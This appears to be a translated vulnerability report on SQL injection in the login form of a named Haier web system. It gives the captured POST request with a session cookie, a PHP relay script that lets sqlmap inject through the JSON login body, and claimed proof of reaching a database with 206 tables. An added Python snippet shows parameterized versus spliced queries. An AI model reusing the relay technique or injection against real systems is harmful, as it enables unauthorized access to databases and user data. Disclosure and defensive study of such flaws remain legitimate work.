System URL: http://evs.haier.net/easp/uiloader/login.html (Haier Electronic Verification System)
On the login page, logging in with a single quote produced an error.
I thought this would be simple: an ordinary POST injection and done.
But I was too naive; the moment I captured the packet, my tears fell.
POST http://evs.haier.net/easp/uiloader/$/ssb/uiloader/ssoLoginMgt/login.ssm HTTP/1.1
Accept: */*
Referer: http://evs.haier.net/easp/uiloader/login.html
Accept-Language: zh-cn
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
Host: evs.haier.net
Content-Length: 40
Proxy-Connection: Keep-Alive
Pragma: no-cache
Cookie: JSESSIONID=2kpTSFLPRmJ2Fn1CYrJlD1GJjhmpVG8knMRSyMzkLRDpFM40t6L2!-881110793; cctUserId=admin; cctLocale=zh
[{"userId":"admin","password":"123456"}]
The parameters go out like this: [{"userId":"admin","password":"123456"}]. SQLmap and the other tools simply don't recognise that format. But this is obviously injectable, isn't it?
So, with no other option, I wrote a relay PHP script. Much love for the newbie approach.
<?php
// Relay script: the GET "id" parameter is substituted into the userId field of the
// JSON login body, so a tool that only understands query-string parameters can be used.
if (empty($_GET['id'])) {
    echo "vip.php?id=z7ysbsbsb";
} else {
    $id = $_GET['id'];
    $post_data = "[{\"userId\":\"$id\",\"password\":\"123456\"}]";
    $url = 'http://evs.haier.net/easp/uiloader/$/ssb/uiloader/ssoLoginMgt/login.ssm';
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_POST, 1);
    curl_setopt($ch, CURLOPT_URL, $url);
    curl_setopt($ch, CURLOPT_POSTFIELDS, $post_data);
    ob_start();
    curl_exec($ch);
    $result = ob_get_contents();
    ob_end_clean();
    curl_close($ch);
    // Pass the server's response back to the caller unchanged.
    echo $result;
}
?>
Here the GET id replaces the userId parameter in the POST body, which is how the injection is carried out.
Let's access it locally and see.
Well, it looks like there is no problem now.
Since this is relay injection, and the local environment is Windows with PHP, what gets detected may differ somewhat from the server.
But the data still cannot get away.
Over.
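As an added example from the defender's side (not code from this report or from the Haier system), here is a Python login handler that parses the exact [{"userId":...,"password":...}] body shown above, with the parameterized lookup beside the string-splicing form whose single-quote error is what the author observed. The table and column names, the stored credential and the use of SQLite are constructed assumptions.

```python
import hashlib
import hmac
import json
import os
import sqlite3

def _hash(password, salt):
    return hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, 100_000)

def build_db():
    # Constructed in-memory stand-in for the application's admin table (names are assumptions).
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE admin_user (user_id TEXT PRIMARY KEY, salt BLOB, pw_hash BLOB)")
    salt = os.urandom(16)
    con.execute("INSERT INTO admin_user VALUES (?, ?, ?)", ("admin", salt, _hash("correct-horse", salt)))
    return con

def parse_login_body(raw):
    # Accept only the exact [{"userId": str, "password": str}] shape the login endpoint uses.
    try:
        body = json.loads(raw)
    except ValueError:
        return None
    if not (isinstance(body, list) and len(body) == 1 and isinstance(body[0], dict)):
        return None
    user_id, password = body[0].get("userId"), body[0].get("password")
    if not (isinstance(user_id, str) and isinstance(password, str) and 0 < len(user_id) <= 64):
        return None
    return user_id, password

def login(con, raw, parameterized=True):
    # Returns "bad_request", "denied" or "ok"; parameterized=False exists only to show the contrast.
    parsed = parse_login_body(raw)
    if parsed is None:
        return "bad_request"
    user_id, password = parsed
    if parameterized:
        # Hardened form: a bound parameter keeps userId as data whatever characters it contains.
        row = con.execute("SELECT salt, pw_hash FROM admin_user WHERE user_id = ?", (user_id,)).fetchone()
    else:
        # The pattern behind the report: the value is spliced into the SQL text, so a quote
        # in userId alters the statement instead of the data (here it surfaces as a syntax error).
        row = con.execute(f"SELECT salt, pw_hash FROM admin_user WHERE user_id = '{user_id}'").fetchone()
    if row is None:
        return "denied"
    salt, pw_hash = row
    return "ok" if hmac.compare_digest(_hash(password, salt), pw_hash) else "denied"
```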
Proof of vulnerability:
A portion of the data.
Database: public
[206 tables]
Fix recommendations:
0x1: Injection, always injection, and always in the login form. It breaks my heart.
0x2: 5-day confirmation period, after which it gets ignored; keep an eye on the timing!